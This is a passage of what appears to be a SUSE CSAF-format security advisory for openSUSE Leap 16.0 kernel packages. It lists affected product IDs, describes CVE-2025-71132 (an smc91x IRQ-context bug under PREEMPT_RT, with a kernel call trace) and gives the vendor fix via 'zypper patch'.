"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71131"
},
{
"cve": "CVE-2025-71132",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71132"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc91x: fix broken irq-context in PREEMPT_RT\n\nWhen smc91x.c is built with PREEMPT_RT, the following splat occurs\nin FVP_RevC:\n\n[ 13.055000] smc91x LNRO0003:00 eth0: link up, 10Mbps, half-duplex, lpa 0x0000\n[ 13.062137] BUG: workqueue leaked atomic, lock or RCU: kworker/2:1[106]\n[ 13.062137] preempt=0x00000000 lock=0-\u003e0 RCU=0-\u003e1 workfn=mld_ifc_work\n[ 13.062266] C\n** replaying previous printk message **\n[ 13.062266] CPU: 2 UID: 0 PID: 106 Comm: kworker/2:1 Not tainted 6.18.0-dirty #179 PREEMPT_{RT,(full)}\n[ 13.062353] Hardware name: , BIOS\n[ 13.062382] Workqueue: mld mld_ifc_work\n[ 13.062469] Call trace:\n[ 13.062494] show_stack+0x24/0x40 (C)\n[ 13.062602] __dump_stack+0x28/0x48\n[ 13.062710] dump_stack_lvl+0x7c/0xb0\n[ 13.062818] dump_stack+0x18/0x34\n[ 13.062926] process_scheduled_works+0x294/0x450\n[ 13.063043] worker_thread+0x260/0x3d8\n[ 13.063124] kthread+0x1c4/0x228\n[ 13.063235] ret_from_fork+0x10/0x20\n\nThis happens because smc_special_trylock() disables IRQs even on PREEMPT_RT,\nbut smc_special_unlock() does not restore IRQs on PREEMPT_RT.\nThe reason is that smc_special_unlock() calls spin_unlock_irqrestore(),\nand rcu_read_unlock_bh() in __dev_queue_xmit() cannot invoke\nrcu_read_unlock() through __local_bh_enable_ip() when current-\u003esoftirq_disable_cnt becomes zero.\n\nTo address this issue, replace smc_special_trylock() with spin_trylock_irqsave().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71132",
"url": "https://www.suse.com/security/cve/CVE-2025-71132"
},
{
"category": "external",
"summary": "SUSE Bug 1256737 for CVE-2025-71132",
"url": "https://bugzilla.suse.com/1256737"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
